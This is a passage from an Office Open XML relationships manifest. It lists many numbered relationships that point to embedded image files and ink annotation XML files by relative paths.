Target="../media/image1500.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1720.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1139.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1920.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1167.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1250.png"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2200.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2300.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1090.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1118.xml"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1204.xml"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1211.xml"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1440.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1670.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1134.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1870.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1155.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1162.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2150.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2250.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1085.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1113.xml"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1189.xml"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1199.xml"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1227.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1390.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1107.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1620.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1129.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1082.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1480.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1830.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1150.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1165.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2100.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2180.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1178.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1080.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1093.xml"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1184.xml"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2280.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1194.xml"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1207.xml"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1340.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1420.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1101.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1570.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1116.xml"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1124.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1700.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1137.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1900.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1209.xml"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1222.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1780.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1145.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1980.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1158.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1160.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2050.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1173.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1088.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2130.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1179.xml"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2230.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2312.png"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1191.xml"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1202.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1290.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1370.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1096.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1520.png"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1111.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1650.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1132.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1860.png"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1217.xml"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1225.xml"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1260.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1105.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1512.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1119.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1730.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1140.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1930.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1153.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1168.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2080.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2160.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1176.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2260.png"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1187.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1197.xml"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1091.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image349.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1600.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1127.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1812.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1205.xml"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1212.xml"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1220.xml"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1320.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1099.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1114.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1680.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1135.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1880.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1148.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1156.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1163.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1960.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2030.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2112.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1171.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2212.png"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1182.xml"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1192.xml"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1086.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1400.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1550.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1122.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1190.xml"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1200.xml"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1215.xml"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1270.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1094.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1490.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1108.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1109.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1630.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1130.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1760.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1840.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1143.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1151.xml"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1240.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1083.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1912.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2060.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1166.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2190.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2290.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1350.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1174.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1185.xml"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1195.xml"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1223.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1102.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1580.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1125.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1790.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1146.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1990.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2012.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1300.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1169.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1180.xml"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2320.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1218.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1097.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1530.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1120.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1740.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1470.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1141.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1940.png"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1164.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2170.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2270.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1206.xml"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1213.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1092.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image350.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1115.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1690.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1136.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1890.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1157.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1159.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2120.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2220.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image383.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1201.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1087.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1412.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1110.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1640.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1104.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1131.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1850.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1152.xml"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1224.xml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2070.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1175.xml"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1186.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1360.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1103.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1590.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1196.xml"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1126.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1800.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1147.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2000.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1219.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2020.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1170.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1181.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1312.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1098.xml"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image384.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1540.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1121.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1750.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1142.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1950.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1214.xml"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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70.xml"/><Relationship Id="rId769" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink41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9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1.xml"/><Relationship Id="rId707" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38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451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20.xml"/><Relationship Id="rId827" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink448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50.xml"/><Relationship Id="rId673" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" 